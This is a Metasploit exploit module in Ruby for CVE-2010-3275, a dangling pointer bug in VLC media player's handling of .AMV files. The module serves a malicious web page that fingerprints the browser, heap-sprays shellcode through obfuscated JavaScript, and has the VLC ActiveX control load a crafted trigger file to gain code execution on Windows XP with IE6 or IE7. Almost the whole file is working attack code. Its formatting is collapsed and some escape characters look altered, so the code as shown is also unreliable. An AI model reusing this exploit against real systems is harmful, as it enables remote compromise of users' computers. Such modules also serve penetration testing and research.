### $Id: vlc_amv.rb 12140 2011-03-26 00:07:36Z sinn3r $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote	Rank = NormalRanking	include Msf::Exploit::Remote::HttpServer::HTML	def initialize(info={})		super(update_info(info,			'Name'        => "VLC AMV Dangling Pointer Vulnerability",			'Description' => %q{				This module exploits VLC media player when handling a .AMV file. By flipping the 0x41st				byte in the file format (video width/height), VLC crashes due to an invalid pointer, which				allows remote attackers to gain arbitrary code execution.								The vulnerable packages include:				VLC 1.1.4				VLC 1.1.5				VLC 1.1.6				VLC 1.1.7				},			'License'     => MSF_LICENSE,			'Version'     => "$Revision: 12140 $",			'Author'      =>				[					'sinn3r',				],			'References' =>				[					['CVE', 'CVE-2010-3275'],					['URL', 'http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files'],				],			'Payload' =>				{					'BadChars'        => "/x00",					'space'           => 1000,					'StackAdjustment' => -3500,				},			'DefaultOptions' =>				{					'ExitFunction' => "process",					'InitialAutoRunScript' => 'migrate -f',				},			'Platform' => 'win',			'Targets'  =>				[					[ 'Automatic', {} ],					[ 'Windows XP SP3 IE6', {'Ret'=>0x0c0c0c0c} ],					[ 'Windows XP SP3 IE7', {'Ret'=>0x1c1c1c1c} ],				],			'DisclosureDate' => "Mar 23 2011",			'DefaultTarget' => 0))	end	def getRet(cli, request)		if target.name == 'Automatic'			agent = request.headers['User-Agent']			case agent			when /MSIE 6/.0/				return [0x0c0c0c0c].pack('V') * 8			when /MSIE 7/.0/				return [0x1c1c1c1c].pack('V') * 8			when /^vlc/				#VLC identifies itself as "VLC" when requesting our trigger file				return ""			when /^NSPlayer/				#NSPlayer is also used while requesting the trigger file				return ""			else				return nil			end		else			#User manually specified a target			return [target.ret].pack('V') * 8		end	end	def exploit		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-3275.amv")		f = File.open(path, "rb")		@trigger = f.read		f.close		super	end	def on_request_uri(cli, request)		#Determine if client is a potential victim either manually or automatically,		#and then return the appropriate EIP		nops = getRet(cli, request)		if nops == nil			send_not_found(cli)			return		end		if request.uri.match(//.amv/)			print_status("Sending trigger file to #{cli.peerhost}:#{cli.peerport}")			send_response(cli, @trigger, { 'Content-Type' => 'text/plain' } )			return		end		nopsled   = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))		js_func_name             = rand_text_alpha(rand(6) + 3)		js_var_blocks_name       = rand_text_alpha(rand(6) + 3)		js_var_shell_name        = rand_text_alpha(rand(6) + 3)		js_var_nopsled_name      = rand_text_alpha(rand(6) + 3)		js_var_index_name        = rand_text_alpha(rand(6) + 3)		trigger_file             = datastore['URIPATH'] + "/" + rand_text_alpha(rand(6) + 3) + ".amv"		html = <<-EOS		<html>		<head>		<script>		function #{js_func_name}() {			var #{js_var_blocks_name} = new Array();			var #{js_var_shell_name} = unescape("#{shellcode}");			var #{js_var_nopsled_name} = unescape("#{nopsled}");			do { #{js_var_nopsled_name} += #{js_var_nopsled_name} } while (#{js_var_nopsled_name}.length < 82000);			for (#{js_var_index_name}=0; #{js_var_index_name} < 3500; #{js_var_index_name}++) {				#{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_nopsled_name} + #{js_var_shell_name};			}		}		#{js_func_name}();		</script>		</head>		<body>		<object classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"				codebase="http://downloads.videolan.org/pub/videolan/vlc/latest/win32/axvlc.cab"				width="0" height="0"				events="True">		<param name="Src" value="#{trigger_file}"></param> 		<param name="ShowDisplay" value="False" ></param> 		<param name="AutoLoop" value="no"></param> 		<param name="AutoPlay" value="yes"></param>		</object>		</body>		</html>		EOS		#Remove extra tabs in HTML		html = html.gsub(/^/t/t/, "")		print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...")		send_response( cli, html, {'Content-Type' => 'text/html'} )	endend